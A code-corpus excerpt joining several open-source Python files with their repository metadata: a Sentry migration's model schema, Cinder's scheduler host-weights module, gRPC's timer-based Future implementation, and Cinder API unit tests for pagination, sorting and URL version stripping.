'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': u"orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': u"orm['sentry.User']"})
},
u'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
u'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
u'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'token_set'", 'to': u"orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'values_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'sentry.team': {
'Meta': {'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'team_memberships'", 'symmetrical': 'False', 'through': u"orm['sentry.TeamMember']", 'to': u"orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
u'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': u"orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': u"orm['sentry.User']"})
},
u'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
}
}
complete_apps = ['sentry']
|
zenefits/sentry
|
src/sentry/south_migrations/0104_auto__add_groupseen__add_unique_groupseen_group_user.py
|
Python
|
bsd-3-clause
| 28,081 | 0.008048 |
# Copyright (c) 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Scheduler host weights
"""
from cinder.openstack.common.scheduler import weight
class WeighedHost(weight.WeighedObject):
def to_dict(self):
return {
'weight': self.weight,
'host': self.obj.host,
}
def __repr__(self):
return ("WeighedHost [host: %s, weight: %s]" %
(self.obj.host, self.weight))
class BaseHostWeigher(weight.BaseWeigher):
"""Base class for host weights."""
pass
class HostWeightHandler(weight.BaseWeightHandler):
object_class = WeighedHost
def __init__(self, namespace):
super(HostWeightHandler, self).__init__(BaseHostWeigher, namespace)
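# A minimal usage sketch, assuming the openstack.common.scheduler weight API
# of this era (get_all_classes/get_weighed_objects are inherited from the
# base loader/handler, not defined in this file):
#
#     handler = HostWeightHandler('cinder.scheduler.weights')
#     weighers = handler.get_all_classes()
#     weighed = handler.get_weighed_objects(weighers, hosts, weighing_properties)
#     best = weighed[0]  # WeighedHost with the highest weight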
|
rickerc/cinder_audit
|
cinder/openstack/common/scheduler/weights/__init__.py
|
Python
|
apache-2.0
| 1,305 | 0 |
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Affords a Future implementation based on Python's threading.Timer."""
import sys
import threading
import time
from grpc.framework.foundation import future
class TimerFuture(future.Future):
"""A Future implementation based around Timer objects."""
def __init__(self, compute_time, computation):
"""Constructor.
Args:
compute_time: The time after which to begin this future's computation.
computation: The computation to be performed within this Future.
"""
self._lock = threading.Lock()
self._compute_time = compute_time
self._computation = computation
self._timer = None
self._computing = False
self._computed = False
self._cancelled = False
        self._return_value = None
self._exception = None
self._traceback = None
self._waiting = []
def _compute(self):
"""Performs the computation embedded in this Future.
Or doesn't, if the time to perform it has not yet arrived.
"""
with self._lock:
time_remaining = self._compute_time - time.time()
if 0 < time_remaining:
self._timer = threading.Timer(time_remaining, self._compute)
self._timer.start()
return
else:
self._computing = True
try:
return_value = self._computation()
exception = None
traceback = None
except Exception as e: # pylint: disable=broad-except
return_value = None
exception = e
traceback = sys.exc_info()[2]
with self._lock:
self._computing = False
self._computed = True
self._return_value = return_value
self._exception = exception
self._traceback = traceback
waiting = self._waiting
for callback in waiting:
callback(self)
def start(self):
"""Starts this Future.
This must be called exactly once, immediately after construction.
"""
with self._lock:
self._timer = threading.Timer(
self._compute_time - time.time(), self._compute)
self._timer.start()
def cancel(self):
"""See future.Future.cancel for specification."""
with self._lock:
if self._computing or self._computed:
return False
elif self._cancelled:
return True
else:
self._timer.cancel()
self._cancelled = True
waiting = self._waiting
for callback in waiting:
try:
callback(self)
except Exception: # pylint: disable=broad-except
pass
return True
def cancelled(self):
"""See future.Future.cancelled for specification."""
with self._lock:
return self._cancelled
def running(self):
"""See future.Future.running for specification."""
with self._lock:
return not self._computed and not self._cancelled
def done(self):
"""See future.Future.done for specification."""
with self._lock:
return self._computed or self._cancelled
def result(self, timeout=None):
"""See future.Future.result for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
if self._exception is None:
return self._return_value
else:
raise self._exception # pylint: disable=raising-bad-type
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
if self._exception is None:
return self._return_value
else:
raise self._exception # pylint: disable=raising-bad-type
else:
raise future.TimeoutError()
def exception(self, timeout=None):
"""See future.Future.exception for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._exception
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._exception
else:
raise future.TimeoutError()
def traceback(self, timeout=None):
"""See future.Future.traceback for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._traceback
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._traceback
else:
raise future.TimeoutError()
def add_done_callback(self, fn):
"""See future.Future.add_done_callback for specification."""
with self._lock:
if not self._computed and not self._cancelled:
self._waiting.append(fn)
return
fn(self)
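# A minimal usage sketch, assuming only this module's public surface (the
# one-second delay and the computation are illustrative values):
#
#     f = TimerFuture(time.time() + 1.0, lambda: 6 * 7)
#     f.start()          # must be called exactly once after construction
#     print(f.result())  # blocks until the timer fires, then prints 42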
|
kidaa/kythe
|
third_party/grpc/src/python/src/grpc/framework/foundation/_timer_future.py
|
Python
|
apache-2.0
| 6,903 | 0.01101 |
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test suites for 'common' code used throughout the OpenStack HTTP API.
"""
import mock
from testtools import matchers
import webob
import webob.exc
from cinder.api import common
from cinder import test
NS = "{http://docs.openstack.org/compute/api/v1.1}"
ATOMNS = "{http://www.w3.org/2005/Atom}"
class LimiterTest(test.TestCase):
"""Unit tests for the `cinder.api.common.limited` method.
This method takes in a list of items and, depending on the 'offset'
and 'limit' GET params, returns a subset or complete set of the given
items.
"""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
self.tiny = range(1)
self.small = range(10)
self.medium = range(1000)
self.large = range(10000)
def test_limiter_offset_zero(self):
"""Test offset key works with 0."""
req = webob.Request.blank('/?offset=0')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_offset_medium(self):
"""Test offset key works with a medium sized number."""
req = webob.Request.blank('/?offset=10')
self.assertEqual(common.limited(self.tiny, req), [])
self.assertEqual(common.limited(self.small, req), self.small[10:])
self.assertEqual(common.limited(self.medium, req), self.medium[10:])
self.assertEqual(common.limited(self.large, req), self.large[10:1010])
def test_limiter_offset_over_max(self):
"""Test offset key works with a number over 1000 (max_limit)."""
req = webob.Request.blank('/?offset=1001')
self.assertEqual([], common.limited(self.tiny, req))
self.assertEqual([], common.limited(self.small, req))
self.assertEqual([], common.limited(self.medium, req))
self.assertEqual(
common.limited(self.large, req), self.large[1001:2001])
def test_limiter_offset_blank(self):
"""Test offset key works with a blank offset."""
req = webob.Request.blank('/?offset=')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_offset_bad(self):
"""Test offset key works with a BAD offset."""
req = webob.Request.blank(u'/?offset=\u0020aa')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_nothing(self):
"""Test request with no offset or limit."""
req = webob.Request.blank('/')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_zero(self):
"""Test limit of zero."""
req = webob.Request.blank('/?limit=0')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_bad(self):
"""Test with a bad limit."""
req = webob.Request.blank(u'/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_limit_medium(self):
"""Test limit of 10."""
req = webob.Request.blank('/?limit=10')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium[:10])
self.assertEqual(common.limited(self.large, req), self.large[:10])
def test_limiter_limit_over_max(self):
"""Test limit of 3000."""
req = webob.Request.blank('/?limit=3000')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_limit_and_offset(self):
"""Test request with both limit and offset."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(common.limited(items, req), items[1:4])
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(common.limited(items, req), items[3:1003])
req = webob.Request.blank('/?offset=3&limit=1500')
self.assertEqual(common.limited(items, req), items[3:1003])
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual(common.limited(items, req), [])
def test_limiter_custom_max_limit(self):
"""Test a max_limit other than 1000."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[1:4])
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[3:])
req = webob.Request.blank('/?offset=3&limit=2500')
self.assertEqual(
common.limited(items, req, max_limit=2000), items[3:])
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual(common.limited(items, req, max_limit=2000), [])
def test_limiter_negative_limit(self):
"""Test a negative limit."""
req = webob.Request.blank('/?limit=-3000')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_negative_offset(self):
"""Test a negative offset."""
req = webob.Request.blank('/?offset=-30')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
class PaginationParamsTest(test.TestCase):
"""Unit tests for `cinder.api.common.get_pagination_params` method.
This method takes in a request object and returns 'marker' and 'limit'
GET params.
"""
def test_nonnumerical_limit(self):
"""Test nonnumerical limit param."""
req = webob.Request.blank('/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params, req)
def test_no_params(self):
"""Test no params."""
req = webob.Request.blank('/')
self.assertEqual({}, common.get_pagination_params(req))
def test_valid_marker(self):
"""Test valid marker param."""
req = webob.Request.blank(
'/?marker=263abb28-1de6-412f-b00b-f0ee0c4333c2')
self.assertEqual({'marker': '263abb28-1de6-412f-b00b-f0ee0c4333c2'},
common.get_pagination_params(req))
def test_valid_limit(self):
"""Test valid limit param."""
req = webob.Request.blank('/?limit=10')
self.assertEqual({'limit': 10}, common.get_pagination_params(req))
def test_invalid_limit(self):
"""Test invalid limit param."""
req = webob.Request.blank('/?limit=-2')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params, req)
def test_valid_limit_and_marker(self):
"""Test valid limit and marker parameters."""
marker = '263abb28-1de6-412f-b00b-f0ee0c4333c2'
req = webob.Request.blank('/?limit=20&marker=%s' % marker)
self.assertEqual({'marker': marker, 'limit': 20},
common.get_pagination_params(req))
class SortParamUtilsTest(test.TestCase):
def test_get_sort_params_defaults(self):
"""Verifies the default sort key and direction."""
sort_keys, sort_dirs = common.get_sort_params({})
self.assertEqual(['created_at'], sort_keys)
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_override_defaults(self):
"""Verifies that the defaults can be overriden."""
sort_keys, sort_dirs = common.get_sort_params({}, default_key='key1',
default_dir='dir1')
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_value_sort_param(self):
"""Verifies a single sort key and direction."""
params = {'sort': 'key1:dir1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_value_old_params(self):
"""Verifies a single sort key and direction."""
params = {'sort_key': 'key1', 'sort_dir': 'dir1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_with_default_sort_param(self):
"""Verifies a single sort value with a default direction."""
params = {'sort': 'key1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
# Direction should be defaulted
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_single_with_default_old_params(self):
"""Verifies a single sort value with a default direction."""
params = {'sort_key': 'key1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
# Direction should be defaulted
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_multiple_values(self):
"""Verifies multiple sort parameter values."""
params = {'sort': 'key1:dir1,key2:dir2,key3:dir3'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir2', 'dir3'], sort_dirs)
def test_get_sort_params_multiple_not_all_dirs(self):
"""Verifies multiple sort keys without all directions."""
params = {'sort': 'key1:dir1,key2,key3:dir3'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
# Second key is missing the direction, should be defaulted
self.assertEqual(['dir1', 'desc', 'dir3'], sort_dirs)
def test_get_sort_params_multiple_override_default_dir(self):
"""Verifies multiple sort keys and overriding default direction."""
params = {'sort': 'key1:dir1,key2,key3'}
sort_keys, sort_dirs = common.get_sort_params(params,
default_dir='foo')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'foo', 'foo'], sort_dirs)
def test_get_sort_params_params_modified(self):
"""Verifies that the input sort parameter are modified."""
params = {'sort': 'key1:dir1,key2:dir2,key3:dir3'}
common.get_sort_params(params)
self.assertEqual({}, params)
        params = {'sort_key': 'key1', 'sort_dir': 'dir1'}
common.get_sort_params(params)
self.assertEqual({}, params)
def test_get_sort_params_random_spaces(self):
"""Verifies that leading and trailing spaces are removed."""
params = {'sort': ' key1 : dir1,key2: dir2 , key3 '}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir2', 'desc'], sort_dirs)
def test_get_params_mix_sort_and_old_params(self):
"""An exception is raised if both types of sorting params are given."""
for params in ({'sort': 'k1', 'sort_key': 'k1'},
{'sort': 'k1', 'sort_dir': 'd1'},
{'sort': 'k1', 'sort_key': 'k1', 'sort_dir': 'd2'}):
self.assertRaises(webob.exc.HTTPBadRequest,
common.get_sort_params,
params)
class MiscFunctionsTest(test.TestCase):
def test_remove_major_version_from_href(self):
fixture = 'http://www.testsite.com/v1/images'
expected = 'http://www.testsite.com/images'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href(self):
fixture = 'http://www.testsite.com/v1.1/images'
expected = 'http://www.testsite.com/images'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_2(self):
fixture = 'http://www.testsite.com/v1.1/'
expected = 'http://www.testsite.com/'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_3(self):
fixture = 'http://www.testsite.com/v10.10'
expected = 'http://www.testsite.com'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_4(self):
fixture = 'http://www.testsite.com/v1.1/images/v10.5'
expected = 'http://www.testsite.com/images/v10.5'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_bad_request(self):
fixture = 'http://www.testsite.com/1.1/images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
def test_remove_version_from_href_bad_request_2(self):
fixture = 'http://www.testsite.com/v/images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
def test_remove_version_from_href_bad_request_3(self):
fixture = 'http://www.testsite.com/v1.1images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
class TestCollectionLinks(test.TestCase):
"""Tests the _get_collection_links method."""
def _validate_next_link(self, href_link_mock, item_count,
osapi_max_limit, limit, should_link_exist):
req = mock.MagicMock()
href_link_mock.return_value = [{"rel": "next",
"href": "fake_link"}]
self.flags(osapi_max_limit=osapi_max_limit)
if limit is None:
params = mock.PropertyMock(return_value=dict())
limited_list_size = min(item_count, osapi_max_limit)
else:
params = mock.PropertyMock(return_value=dict(limit=limit))
limited_list_size = min(item_count, osapi_max_limit,
limit)
limited_list = [{"uuid": str(i)} for i in range(limited_list_size)]
type(req).params = params
builder = common.ViewBuilder()
results = builder._get_collection_links(req, limited_list,
mock.sentinel.coll_key,
item_count, "uuid")
if should_link_exist:
href_link_mock.assert_called_once_with(limited_list, "uuid",
req,
mock.sentinel.coll_key)
self.assertThat(results, matchers.HasLength(1))
else:
self.assertFalse(href_link_mock.called)
self.assertThat(results, matchers.HasLength(0))
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_osapi_max_no_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 5
limit = None
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_osapi_max_greater_than_limit(self,
href_link_mock):
item_count = 5
osapi_max_limit = 5
limit = 4
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_osapi_max_equals_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 5
limit = 5
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_osapi_max_less_than_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 5
limit = 6
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_less_than_osapi_max_no_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = None
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_limit_less_than_items_less_than_osapi_max(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 4
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_limit_equals_items_less_than_osapi_max(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 5
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_less_than_limit_less_than_osapi_max(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 6
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_less_than_osapi_max_equals_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 7
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_less_than_osapi_max_less_than_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 7
limit = 8
should_link_exist = False
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_greater_than_osapi_max_no_limit(self, href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = None
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_limit_less_than_items_greater_than_osapi_max(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 2
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_greater_than_osapi_max_equals_limit(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 3
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_greater_than_limit_greater_than_osapi_max(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 4
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_items_equals_limit_greater_than_osapi_max(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 5
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
@mock.patch('cinder.api.common.ViewBuilder._generate_next_link')
def test_limit_greater_than_items_greater_than_osapi_max(self,
href_link_mock):
item_count = 5
osapi_max_limit = 3
limit = 6
should_link_exist = True
self._validate_next_link(href_link_mock, item_count,
osapi_max_limit,
limit, should_link_exist)
